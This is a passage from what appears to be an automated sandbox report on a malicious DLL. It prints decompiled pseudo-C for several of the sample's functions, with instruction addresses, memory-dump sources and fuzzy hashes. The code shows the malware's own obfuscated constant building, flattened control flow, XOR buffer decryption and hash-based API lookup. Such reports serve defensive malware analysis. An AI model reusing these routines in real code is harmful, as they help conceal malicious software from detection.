				_t131 =  &(( &_v600)[4]);
				_v560 = 0x11afe4;
				_v572 = 0x705fac;
				_v572 = _v572 >> 3;
				_t112 = 0x5dfd87c;
				_v572 = _v572 ^ 0x000e0be5;
				_v600 = 0x66ffbc;
				_v600 = _v600 << 5;
				_v600 = _v600 + 0xffffdeb6;
				_v600 = _v600 >> 3;
				_v600 = _v600 ^ 0x019de099;
				_v564 = 0xb3cc88;
				_v564 = _v564 >> 0xc;
				_v564 = _v564 ^ 0x000695d5;
				_v576 = 0xedaac2;
				_v576 = _v576 | 0x8d88b270;
				_t126 = 0xa;
				_v576 = _v576 / _t126;
				_v576 = _v576 ^ 0x0e34170c;
				_v568 = 0xd34644;
				_v568 = _v568 << 0xd;
				_v568 = _v568 ^ 0x68c9882a;
				_v596 = 0xa76cec;
				_v596 = _v596 + 0xf564;
				_v596 = _v596 | 0x7a23d379;
				_t127 = 0x75;
				_v596 = _v596 / _t127;
				_v596 = _v596 ^ 0x010c78ac;
				_v588 = 0xf6d5ff;
				_v588 = _v588 ^ 0x1e4d5d29;
				_v588 = _v588 | 0xf865f4c1;
				_v588 = _v588 ^ 0xfef0a2a0;
				_v592 = 0xc86264;
				_v592 = _v592 + 0xffff9c97;
				_v592 = _v592 << 0xb;
				_v592 = _v592 + 0x20dd;
				_v592 = _v592 ^ 0x3ff909a0;
				_v584 = 0x196fa2;
				_v584 = _v584 >> 3;
				_v584 = _v584 | 0xe537cc6c;
				_v584 = _v584 ^ 0xe53246df;
				_v580 = 0xb6108b;
				_v580 = _v580 + 0xfdd;
				_v580 = _v580 << 3;
				_v580 = _v580 ^ 0x05ba306f;
				do {
					while(_t112 != 0x5b30f91) {
						if(_t112 == 0x5dfd87c) {
							_t109 = E0087FE2A(_v600, _v564, _v572,  &_v552);
							_t112 = 0xb74f612;
							continue;
						} else {
							if(_t112 == 0xb74f612) {
								_t109 = E00862F80( &_v520, _v576, _v568, _v596);
								_t131 =  &(_t131[3]);
								_t112 = 0x5b30f91;
								continue;
							}
						}
						goto L7;
					}
					E008706FE(_v588, _v592, _a8,  &_v520, _v584, _t112,  &_v552, _v580);
					_t131 =  &(_t131[6]);
					_t112 = 0xf20a46f;
					L7:
				} while (_t112 != 0xf20a46f);
				return _t109;
			}

0x00861cab
0x00861cb2
0x00861cb9
0x00861cba
0x00861cbb
0x00861cc0
0x00861cc5
0x00861cc8
0x00861cd2
0x00861cdf
0x00861ce4
0x00861ce6
0x00861cf3
0x00861d00
0x00861d05
0x00861d0d
0x00861d12
0x00861d1a
0x00861d22
0x00861d27
0x00861d2f
0x00861d37
0x00861d45
0x00861d4a
0x00861d50
0x00861d58
0x00861d60
0x00861d65
0x00861d6d
0x00861d75
0x00861d7d
0x00861d89
0x00861d91
0x00861d95
0x00861d9d
0x00861da5
0x00861dad
0x00861db5
0x00861dbd
0x00861dc5
0x00861dcd
0x00861dd2
0x00861dda
0x00861de2
0x00861dea
0x00861def
0x00861df7
0x00861dff
0x00861e07
0x00861e0f
0x00861e14
0x00861e1c
0x00861e1c
0x00861e22
0x00861e55
0x00861e5c
0x00000000
0x00861e24
0x00861e26
0x00861e38
0x00861e3d
0x00861e40
0x00000000
0x00861e40
0x00861e26
0x00000000
0x00861e22
0x00861e82
0x00861e87
0x00861e8a
0x00861e8c
0x00861e8c
0x00861e9a

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
Instruction ID: 7e24bb8c86307052dde0e8e6ebdb0264be757b1b23a602a001fd8ee38424204f
Opcode Fuzzy Hash: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
Instruction Fuzzy Hash: B25150721093029FCB54DF21D88A41FBBE1FBD4758F444A2CF19A96222D7B58A498F87

Uniqueness

Uniqueness Score: -1.00%

Function 0087FF58, Relevance: .1, Instructions: 97
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0087FF58(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _t121;
				signed int* _t123;
				intOrPtr _t125;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t140;

				_v24 = 0xfb956e;
				_v24 = _v24 ^ 0xccd4b1e5;
				_v24 = _v24 << 2;
				_v24 = _v24 ^ 0x30bd930f;
				_v44 = 0xac147c;
				_t137 = __edx;
				_v44 = _v44 * 0x49;
				_v44 = _v44 ^ 0x31196cd2;
				_v8 = 0x40a8d3;
				_v8 = _v8 | 0x3acc4d3b;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x3596af33;
				_v40 = 0x7a1af9;
				_v40 = _v40 | 0x9e6699ed;
				_v40 = _v40 ^ 0x9e79921f;
				_v28 = 0x2e80d;
				_v28 = _v28 | 0x96bed856;
				_v28 = _v28 + 0x6398;
				_v28 = _v28 ^ 0x96be47ad;
				_v16 = 0x1a939;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 + 0xffff851f;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x0002802d;
				_v12 = 0x8a82de;
				_v12 = _v12 + 0xffff96d2;
				_v12 = _v12 << 0xd;
				_t138 = 0x7d;
				_v12 = _v12 / _t138;
				_v12 = _v12 ^ 0x00892f26;
				_v48 = 0xf49a5c;
				_v48 = _v48 + 0x7176;
				_v48 = _v48 ^ 0x00fa98c0;
				_v52 = 0x2df28f;
				_t139 = 0x75;
				_v52 = _v52 / _t139;
				_v52 = _v52 ^ 0x0004ae50;
				_v36 = 0xfa4daf;
				_v36 = _v36 << 0xc;
				_t140 = 0x6f;
				_v36 = _v36 * 0x11;
				_v36 = _v36 ^ 0xf2876c8f;
				_v32 = 0x3a5591;
				_v32 = _v32 >> 4;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00085aff;
				_v20 = 0x5fc7f5;
				_v20 = _v20 / _t140;
				_v20 = _v20 << 0xc;
				_v20 = _v20 >> 9;
				_v20 = _v20 ^ 0x000581a9;
				_push(_v40);
				_push(_v8);
				_push(_v44);
				_t121 = E008652B9(E0087E1F8(_t123, _v24, _v20), _v28, _v16, _v12, _v48);
				_t125 =  *0x88620c; // 0x0
				 *((intOrPtr*)(_t125 + 0x14 + _t137 * 4)) = _t121;
				return E0087FECB(_t120, _v52, _v36, _v32, _v20);
			}

0x0087ff5e
0x0087ff65
0x0087ff6c
0x0087ff70
0x0087ff77
0x0087ff86
0x0087ff8a
0x0087ff8d
0x0087ff94
0x0087ff9b
0x0087ffa2
0x0087ffa6
0x0087ffaa
0x0087ffb1
0x0087ffb8
0x0087ffbf
0x0087ffc6
0x0087ffcd
0x0087ffd4
0x0087ffdb
0x0087ffe2
0x0087ffe9
0x0087ffed
0x0087fff4
0x0087fff8
0x0087ffff
0x00880006
0x0088000d
0x00880014
0x00880019
0x0088001e
0x00880025
0x0088002c
0x00880033
0x0088003a
0x00880044
0x00880049
0x0088004e
0x00880055
0x0088005c
0x00880064
0x00880065
0x00880068
0x0088006f
0x00880076
0x0088007a
0x0088007e
0x00880085
0x00880091
0x00880094
0x00880098
0x0088009c
0x008800a3
0x008800a6
0x008800a9
0x008800c4
0x008800c9
0x008800d2
0x008800ee

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b38b4f612bc6c768aa21253d777ccd82d1ca2d746f7f6aab4a9cdd200019aa0
Instruction ID: 33318aa8d433461329f33177c6c210b1dbab15fe27d4442fed16fb6c577fc451
Opcode Fuzzy Hash: 0b38b4f612bc6c768aa21253d777ccd82d1ca2d746f7f6aab4a9cdd200019aa0
Instruction Fuzzy Hash: 6741FD72D0122DEBCF08DFA5D94A4DEBFB2FB48314F108199D522B6220D3B90A59DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00874244, Relevance: .1, Instructions: 91
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00874244(void* __ecx, void* __edx, void* __eflags) {
				signed int* _t49;
				signed int _t51;
				unsigned int* _t65;
				signed int _t66;
				signed int _t68;
				signed int _t72;
				unsigned int _t73;
				unsigned int _t74;
				unsigned int* _t77;
				signed int* _t78;
				signed int* _t79;
				unsigned int _t81;
				void* _t87;
				void* _t89;
				void* _t91;
				void* _t93;

				_push( *(_t91 + 0x2c));
				_push( *(_t91 + 0x2c));
				_push( *((intOrPtr*)(_t91 + 0x18)));
				_t49 = E0087FE29( *((intOrPtr*)(_t91 + 0x18)));
				 *(_t91 + 0x28) = 0x3d5cbc;
				_t5 =  &(_t49[1]); // 0x4
				_t78 = _t5;
				 *(_t91 + 0x28) =  *(_t91 + 0x28) | 0x6bd7da0a;
				 *(_t91 + 0x28) =  *(_t91 + 0x28) ^ 0x6bf86309;
				 *(_t91 + 0x38) = 0xea1d3d;
				 *(_t91 + 0x38) =  *(_t91 + 0x38) | 0x10653bc0;
				 *(_t91 + 0x38) =  *(_t91 + 0x38) ^ 0x4ee4a363;
				 *(_t91 + 0x38) =  *(_t91 + 0x38) | 0xb4800a62;
				 *(_t91 + 0x38) =  *(_t91 + 0x38) ^ 0xfe847125;
				 *(_t91 + 0x24) = 0x45f786;
				 *(_t91 + 0x24) =  *(_t91 + 0x24) | 0x34f761f8;
				 *(_t91 + 0x24) =  *(_t91 + 0x24) ^ 0x34f5c6b3;
				 *(_t91 + 0x20) = 0xc15f52;
				 *(_t91 + 0x20) =  *(_t91 + 0x20) ^ 0x92036f91;
				 *(_t91 + 0x20) =  *(_t91 + 0x20) ^ 0x92c36404;
				_t68 =  *_t49;
				_t79 =  &(_t78[1]);
				_t51 =  *_t78 ^ _t68;
				 *(_t91 + 0x2c) = _t68;
				 *(_t91 + 0x30) = _t51;
				_t31 = _t51 + 1; // 0x1
				_t81 =  !=  ? (_t31 & 0xfffffffc) + 4 : _t31;
				_t65 = E0086C5D8(_t81);
				_t93 = _t91 + 0x18;
				 *(_t93 + 0x24) = _t65;
				if(_t65 != 0) {
					_t89 = 0;
					_t77 = _t65;
					_t87 =  >  ? 0 :  &(_t79[_t81 >> 2]) - _t79 + 3 >> 2;
					if(_t87 != 0) {
						_t66 =  *(_t93 + 0x1c);
						do {
							_t72 =  *_t79;
							_t79 =  &(_t79[1]);
							_t73 = _t72 ^ _t66;
							 *_t77 = _t73;
							_t77 =  &(_t77[1]);
							_t74 = _t73 >> 0x10;
							 *((char*)(_t77 - 3)) = _t73 >> 8;
							 *(_t77 - 2) = _t74;
							_t89 = _t89 + 1;
							 *((char*)(_t77 - 1)) = _t74 >> 8;
						} while (_t89 < _t87);
						_t65 =  *(_t93 + 0x28);
					}
					 *((char*)(_t65 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
				}
				return _t65;
			}

0x0087424e
0x00874252
0x00874256
0x00874259
0x0087425e
0x00874266
0x00874266
0x00874269
0x00874271
0x00874279
0x00874281
0x00874289
0x00874291
0x00874299
0x008742a1
0x008742a9
0x008742b1
0x008742b9
0x008742c1
0x008742c9
0x008742d1
0x008742d5
0x008742d8
0x008742da
0x008742de
0x008742e2
0x008742f2
0x0087430e
0x00874310
0x00874313
0x00874319
0x00874321
0x00874323
0x00874334
0x00874339
0x0087433b
0x0087433f
0x0087433f
0x00874341
0x00874344
0x00874346
0x0087434d
0x00874350
0x00874353
0x00874356
0x0087435c
0x0087435d
0x00874360
0x00874364
0x00874364
0x0087436d
0x0087436d
0x00874379

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37e89cb84dd8fa63864b63d4cf921de512c7c968c9f482bdb6f048739d92c7a5
Instruction ID: 32441ba12b5c7a71fffa2b17580632bb2a1d264b30afdae0d784a007f0477762
Opcode Fuzzy Hash: 37e89cb84dd8fa63864b63d4cf921de512c7c968c9f482bdb6f048739d92c7a5
Instruction Fuzzy Hash: 053189726083408FC305CF28C88185BFBE0FB88714F454B6DF88AA7221D774EA09CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00873D85, Relevance: .1, Instructions: 86
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00873D85(void* __ecx, signed int* __edx, void* __eflags, signed int* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				void* _t46;
				signed int _t49;
				signed int* _t63;
				void* _t69;
				signed int _t72;
				void* _t77;
				unsigned int _t79;
				void* _t81;
				signed int* _t82;
				signed int* _t83;
				void* _t84;

				_t63 = _a4;
				_push(_a8);
				_push(_t63);
				_push(__edx);
				E0087FE29(_t46);
				_v12 = 0xc30617;
				_t82 =  &(__edx[1]);
				_v12 = _v12 >> 8;
				_v12 = _v12 ^ 0x0000aeb3;
				_v20 = 0xf93b19;
				_v20 = _v20 * 0x55;
				_v20 = _v20 ^ 0x85e9037f;
				_v20 = _v20 + 0xffff2dcc;
				_v20 = _v20 ^ 0xd720e096;
				_v16 = 0x37fa8e;
				_v16 = _v16 ^ 0xc309fd15;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x018ad68f;
				_v24 = 0x2aa640;
				_v24 = _v24 | 0xaf302e4c;
				_v24 = _v24 << 2;
				_v24 = _v24 | 0xa0025b53;
				_v24 = _v24 ^ 0xbce807cd;
				_t49 =  *__edx;
				_t83 =  &(_t82[1]);
				_t72 =  *_t82 ^ _t49;
				_v8 = _t49;
				_v4 = _t72;
				_t79 =  !=  ? (_t72 & 0xfffffffc) + 4 : _t72;
				_t84 = E0086C5D8(_t79);
				if(_t84 == 0) {
					L6:
					return _t84;
				}
				_t81 = 0;
				_t77 =  >  ? 0 :  &(_t83[_t79 >> 2]) - _t83 + 3 >> 2;
				if(_t77 == 0) {
					L4:
					if(_t63 != 0) {
						 *_t63 = _v4;
					}
					goto L6;
				}
				_t69 = _t84 - _t83;
				do {
					_t81 = _t81 + 1;
					 *(_t69 + _t83) =  *_t83 ^ _v8;
					_t83 =  &(_t83[1]);
				} while (_t81 < _t77);
				goto L4;
			}

0x00873d89
0x00873d90
0x00873d94
0x00873d95
0x00873d97
0x00873d9c
0x00873da4
0x00873da7
0x00873dac
0x00873db4
0x00873dc1
0x00873dc5
0x00873dcd
0x00873dd5
0x00873ddd
0x00873de5
0x00873ded
0x00873df2
0x00873dfa
0x00873e02
0x00873e0a
0x00873e0f
0x00873e17
0x00873e1f
0x00873e23
0x00873e26
0x00873e28
0x00873e2e
0x00873e3f
0x00873e5b
0x00873e62
0x00873ea2
0x00873ea9
0x00873ea9
0x00873e6c
0x00873e7a
0x00873e7f
0x00873e96
0x00873e98
0x00873e9e
0x00873e9e
0x00000000
0x00873e98
0x00873e83
0x00873e85
0x00873e8b
0x00873e8c
0x00873e8f
0x00873e92
0x00000000

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
Instruction ID: e3a82dbced6ce552bb785eed945a1f8cd683f7189c519669693ccb4fa07b8849
Opcode Fuzzy Hash: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
Instruction Fuzzy Hash: 5B3167726083008FC718DE29C98641BBBE2FBD8718F448B2DE48DE7214DB74EA058B46

Uniqueness

Uniqueness Score: -1.00%

Function 0086F0E9, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E0086F0E9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t69;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t87;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t69);
				_v8 = 0x819b57;
				_v8 = _v8 >> 0x10;
				_t83 = 0x17;
				_v8 = _v8 / _t83;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x00008000;
				_v24 = 0x7d8883;
				_v24 = _v24 >> 0xd;
				_v24 = _v24 + 0xffff5cfc;
				_v24 = _v24 ^ 0xfff105d0;
				_v16 = 0x4e701e;
				_v16 = _v16 ^ 0xb2bd4297;
				_t84 = 0x5b;
				_v16 = _v16 / _t84;
				_t85 = 0x7f;
				_v16 = _v16 / _t85;
				_v16 = _v16 ^ 0x000cfa43;
				_v12 = 0xc80371;
				_t86 = 0x37;
				_v12 = _v12 / _t86;
				_v12 = _v12 >> 1;
				_t87 = 0x79;
				_v12 = _v12 / _t87;
				_v12 = _v12 ^ 0x0004b486;
				_v20 = 0xa43314;
				_v20 = _v20 << 3;
				_v20 = _v20 + 0xa205;
				_v20 = _v20 ^ 0x052abea0;
				return E0086F8A9(_v24, _v16, __edx, _v12, _v8, _v20);
			}

0x0086f0f0
0x0086f0f5
0x0086f0f8
0x0086f0f9
0x0086f0fa
0x0086f0ff
0x0086f108
0x0086f111
0x0086f116
0x0086f11b
0x0086f11f
0x0086f126
0x0086f12d
0x0086f131
0x0086f138
0x0086f13f
0x0086f146
0x0086f150
0x0086f155
0x0086f15d
0x0086f162
0x0086f167
0x0086f16e
0x0086f178
0x0086f17d
0x0086f182
0x0086f188
0x0086f18b
0x0086f18e
0x0086f195
0x0086f19c
0x0086f1a0
0x0086f1a7
0x0086f1ca

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
Instruction ID: 29ce870b6a24854d97c2b5a91ca0b31b4ce908464123a8ea45e0b246edaa6b48
Opcode Fuzzy Hash: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
Instruction Fuzzy Hash: B5212776D00209EBDB08CFE5C8095DEBBB2EB44314F20C09AE514AB291D7B15B54DF81

Uniqueness

Uniqueness Score: -1.00%

Function 0087567B, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0087567B(void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t66;
				void* _t70;
				signed int _t71;
				signed int _t72;
				intOrPtr* _t81;
				intOrPtr* _t82;
				void* _t83;

				_v16 = 0x3cd044;
				_v16 = _v16 + 0x8a1e;
				_t70 = __edx;
				_t71 = 0x23;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x000ceb59;
				_v20 = 0x98fec3;
				_v20 = _v20 + 0x117b;
				_v20 = _v20 ^ 0x00928bce;
				_v12 = 0xc66557;
				_v12 = _v12 | 0xbd5cb058;
				_t72 = 0x6a;
				_v12 = _v12 / _t72;
				_v12 = _v12 * 0x5e;
				_v12 = _v12 ^ 0xa86b283b;
				_v8 = 0xf205aa;
				_v8 = _v8 ^ 0x840ccd49;
				_v8 = _v8 + 0x2990;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x0003f43b;
				_v28 = 0xeebda;
				_v28 = _v28 + 0xdccc;
				_v28 = _v28 ^ 0x00000347;
				_v24 = 0xa36d5e;
				_v24 = _v24 | 0xd0b00948;
				_v24 = _v24 ^ 0xd0bd6ebb;
				_t81 =  *((intOrPtr*)(E0086F7F7() + 0xc)) + 0xc;
				_t82 =  *_t81;
				while(_t82 != _t81) {
					_t66 = E0086EFE1(_v8, _v28, _v24,  *((intOrPtr*)(_t82 + 0x30)));
					_t83 = _t83 + 0xc;
					if((_t66 ^ 0x2d567c83) == _t70) {
						return  *((intOrPtr*)(_t82 + 0x18));
					}
					_t82 =  *_t82;
				}
				return 0;
			}

0x00875681
0x00875688
0x00875695
0x0087569b
0x008756a0
0x008756a5
0x008756ac
0x008756b3
0x008756ba
0x008756c1
0x008756c8
0x008756d2
0x008756d5
0x008756dc
0x008756df
0x008756e6
0x008756ed
0x008756f4
0x008756fb
0x008756ff
0x00875706
0x0087570d
0x00875714
0x0087571b
0x00875722
0x00875729
0x0087573e
0x00875741
0x00875767
0x00875754
0x0087575e
0x00875763
0x00000000
0x00875774
0x00875765
0x00875765
0x00000000

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
Instruction ID: 99bd68b3a3d6136b0d8664ae027ca7d35949bb586de70c2b3a2c9f32b5e7e2e0
Opcode Fuzzy Hash: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
Instruction Fuzzy Hash: 20314672E00209EFDB58DFA9C88A8AEFBB1FB40318F248099D515BB210D3B45F558F81

Uniqueness

Uniqueness Score: -1.00%

Function 00870EBC, Relevance: .1, Instructions: 58
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E00870EBC(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a28, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t44;
				intOrPtr* _t51;

				E0087FE29(_t44);
				_v20 = 0x5f9276;
				_v20 = _v20 >> 6;
				_v20 = _v20 >> 0xa;
				_v20 = _v20 ^ 0x0000ae6f;
				_v16 = 0x7df0fb;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x9952d77b;
				_v16 = _v16 ^ 0x9951c792;
				_v12 = 0xf93209;
				_v12 = _v12 | 0xf37a8f1a;
				_v12 = _v12 + 0xffff09ac;
				_v12 = _v12 + 0xa761;
				_v12 = _v12 ^ 0xf3f42664;
				_v8 = 0x4c6886;
				_v8 = _v8 ^ 0x2aaf40fd;
				_v8 = _v8 * 0x7c;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x0632021c;
				_t51 = E0086EB52(__ecx, __ecx, 0xc0c22a7, 0x4d, 0xa2289af1);
				return  *_t51(0, 0, _a32, _a28, 0, 0, __ecx, 0, _a4, 0, _a12, _a16, 0, 0, _a28, _a32);
			}

0x00870ed9
0x00870ede
0x00870ee8
0x00870eec
0x00870ef0
0x00870ef7
0x00870efe
0x00870f02
0x00870f09
0x00870f10
0x00870f17
0x00870f1e
0x00870f25
0x00870f2c
0x00870f33
0x00870f3a
0x00870f52
0x00870f55
0x00870f59
0x00870f6d
0x00870f85

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
Instruction ID: 5cecdfd1df0dc3965c1dfe7da295c0735a1590356a8d3fcb19a040a6ae02b078
Opcode Fuzzy Hash: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
Instruction Fuzzy Hash: 03210E72801219FBCF19DFA5CD4A8CEBFB4FF08354F108688A958A2220D3798A14DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0086EF0C, Relevance: .1, Instructions: 56
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0086EF0C(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _t57;
				signed int _t67;

				_v28 = 4;
				_v24 = 0xd6e1b5;
				_v24 = _v24 | 0x5e4e7cd1;
				_v24 = _v24 >> 0x10;
				_v24 = _v24 ^ 0x20005ede;
				_v12 = 0x35fbf9;
				_v12 = _v12 << 2;
				_v12 = _v12 + 0xffffd421;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x000779ff;
				_v8 = 0xb66603;
				_v8 = _v8 | 0x4ba1ba6b;
				_v8 = _v8 ^ 0x6df4d1b9;
				_v8 = _v8 ^ 0x1286fe83;
				_v8 = _v8 ^ 0x34cd5dfe;
				_v20 = 0x1bb0b6;
				_v20 = _v20 | 0x21937f20;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x19bd1c5b;
				_v16 = 0xd95204;
				_v16 = _v16 ^ 0x6876e9a1;
				_t67 = 0x62;
				_v16 = _v16 / _t67;
				_v16 = _v16 ^ 0x01180520;
				_t57 = E008760B8(_v12, _v24 | __edx, _v8,  &_v28,  &_v32, __ecx, __ecx, _v20, _v16);
				asm("sbb eax, eax");
				return  ~_t57 & _v32;
			}

0x0086ef12
0x0086ef19
0x0086ef20
0x0086ef27
0x0086ef2b
0x0086ef32
0x0086ef39
0x0086ef3d
0x0086ef44
0x0086ef48
0x0086ef4f
0x0086ef56
0x0086ef5d
0x0086ef64
0x0086ef6b
0x0086ef72
0x0086ef79
0x0086ef80
0x0086ef84
0x0086ef8d
0x0086ef96
0x0086efa4
0x0086efa7
0x0086efad
0x0086efcc
0x0086efd6
0x0086efe0

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0453756cfbe0a422653622112b7418f35eca55d4e05d609691c55542fdca0349
Instruction ID: 48043a075226b6cde43c74fe4c625c8de495e81c56e38ff3e14a7844775c79f6
Opcode Fuzzy Hash: 0453756cfbe0a422653622112b7418f35eca55d4e05d609691c55542fdca0349
Instruction Fuzzy Hash: 2221E372C0120DABDB09DFE5CA4A5EFFBB5EB44204F608299D516B6220D3B54B059FA2

Uniqueness

Uniqueness Score: -1.00%

Function 0086C5D8, Relevance: .1, Instructions: 53
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0086C5D8(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _t69;
				signed int _t70;

				_v32 = _v32 & 0x00000000;
				_v36 = 0xa0afa0;
				_v28 = 0x9adc8d;
				_v28 = _v28 ^ 0x90925320;
				_v28 = _v28 ^ 0x90088fa5;
				_v24 = 0x1cb3a6;
				_v24 = _v24 << 0x10;
				_v24 = _v24 ^ 0xb3a3d0bd;
				_v8 = 0xc8bfd2;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0x77b2;
				_t69 = 0x16;
				_v8 = _v8 / _t69;
				_v8 = _v8 ^ 0x0000123c;
				_v20 = 0x3ff815;
				_v20 = _v20 | 0x9e661a12;
				_v20 = _v20 + 0x3006;
				_v20 = _v20 ^ 0x9e825c55;
				_v12 = 0xda9b76;
				_t70 = 0x6b;
				_v12 = _v12 / _t70;
				_v12 = _v12 | 0xed94e7c2;
				_v12 = _v12 + 0xffffd684;
				_v12 = _v12 ^ 0xed94606e;
				_v16 = 0x191c50;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x00013f6e;
